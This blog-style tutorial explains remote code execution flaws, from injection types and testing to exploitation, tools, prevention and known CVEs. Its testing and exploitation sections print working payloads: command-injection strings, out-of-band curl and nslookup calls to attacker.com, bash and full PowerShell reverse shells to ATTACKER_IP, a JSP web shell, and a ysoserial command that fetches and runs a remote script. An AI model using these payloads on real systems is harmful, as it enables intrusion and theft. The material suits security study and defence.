Remote Code Execution (RCE) Vulnerabilities Explained
Remote Code Execution (RCE) Vulnerabilities Explained

Remote Code Execution (RCE) Vulnerabilities Explained

The complete guide to understanding, finding, and preventing RCE flaws

⚠️ Legal Disclaimer: This guide is for educational purposes only. Unauthorized testing is illegal.

What is Remote Code Execution?

Remote Code Execution (RCE) is a vulnerability that allows attackers to execute arbitrary code on a target system or application. It represents the most severe class of security flaws because:

  • Provides complete control over the vulnerable system
  • Often leads to full system compromise
  • Can be used to pivot to other systems in the network
1
Vulnerable Input
Application accepts unsanitized user input in dangerous functions
2
Malicious Payload
Attacker crafts input containing executable code
3
Code Execution
Server processes input and executes attacker’s code
4
System Compromise
Attacker gains shell access or performs other malicious actions

Common RCE Vulnerability Types

1. Command Injection

Direct execution of system commands through vulnerable parameters:

; cat /etc/passwd
| id
`whoami`

2. Deserialization Attacks

Malicious object serialization leading to code execution:

Java, .NET, Python pickle objects

3. Server-Side Template Injection

Code execution through template engines:

{{7*7}}  → 49
${"ls".exec()}

4. File Inclusion Vulnerabilities

Including malicious files leading to code execution:

?page=http://evil.com/shell.txt
?load=php://filter/convert.base64-encode/resource=index.php

5. Buffer Overflows

Overwriting memory to control execution flow:

AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde

6. Expression Language Injection

Code execution through expression evaluation:

#{7*7}
${7*7}

Where to Find RCE Vulnerabilities

1. User Input Points

  • Form fields (search, contact forms)
  • File upload functionality
  • URL parameters
  • API endpoints

2. Dangerous Functions

Language Dangerous Functions
PHP exec(), system(), passthru(), eval(), preg_replace()
Python eval(), exec(), pickle.loads(), os.system()
Java Runtime.exec(), ProcessBuilder(), JNDI lookup
JavaScript eval(), Function(), setTimeout() with strings

Testing for RCE Vulnerabilities

1. Basic Testing Payloads

# Unix commands
; ls -la /
`id`
$(whoami)
| cat /etc/passwd

# Windows commands
& dir C:\
| type C:\Windows\win.ini
%SYSTEMROOT%\System32\calc.exe

2. Time-Based Detection

When blind, use time delays to confirm execution:

# Unix
; sleep 5
`sleep 5`
$(sleep 5)

# Windows
& timeout /t 5
| ping -n 5 127.0.0.1

3. Out-of-Band Detection

Use DNS or HTTP requests to confirm execution:

# Unix
; curl http://attacker.com/$(whoami)
`nslookup $(hostname).attacker.com`

# Windows
& nslookup %COMPUTERNAME%.attacker.com

Exploiting RCE Vulnerabilities

1. Getting a Reverse Shell

# Unix
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

# Windows
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

2. File Upload RCE

When file uploads are allowed:

# PHP shell


# JSP shell
<%= Runtime.getRuntime().exec(request.getParameter("cmd")) %>

3. Deserialization Exploits

Using ysoserial for Java deserialization:

java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload.ser

Tools for Finding RCE Vulnerabilities

Tool Purpose Command
Burp Suite Manual testing and scanning Active Scan, Intruder
Commix Automated command injection commix -u “http://example.com?input=test”
Ysoserial Java deserialization payloads java -jar ysoserial.jar [gadget] [command]
SQLmap SQLi to RCE via file operations sqlmap -u “http://example.com?id=1” –os-shell
Metasploit RCE exploit modules use exploit/multi/handler

Preventing RCE Vulnerabilities

1. Secure Coding Practices

  • Avoid using eval() and similar functions
  • Use safe alternatives to system commands
  • Implement proper input validation

2. Security Controls

  • Implement Web Application Firewalls (WAF)
  • Use parameterized APIs instead of string concatenation
  • Apply the principle of least privilege
Pro Tip: Use process whitelisting where possible, only allowing specific, approved commands to execute.

3. Runtime Protection

  • Disable dangerous functions in php.ini
  • Use Java Security Manager
  • Implement containerization with limited capabilities

Real-World RCE Examples

1. Log4Shell (CVE-2021-44228)

JNDI lookup vulnerability in Log4j allowing RCE through logged messages.

2. Apache Struts (CVE-2017-5638)

OGNL expression injection leading to RCE in file upload error handling.

3. PHP unserialize() Vulnerabilities

Numerous CMS vulnerabilities through unsafe object deserialization.

Conclusion

Remote Code Execution vulnerabilities represent the most critical web security risk because:

  • They provide complete system control to attackers
  • Often lead to full network compromise
  • Can be chained with other vulnerabilities
Remember: Defense-in-depth is crucial – combine secure coding, proper configuration, and runtime protections.

Further Resources

Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *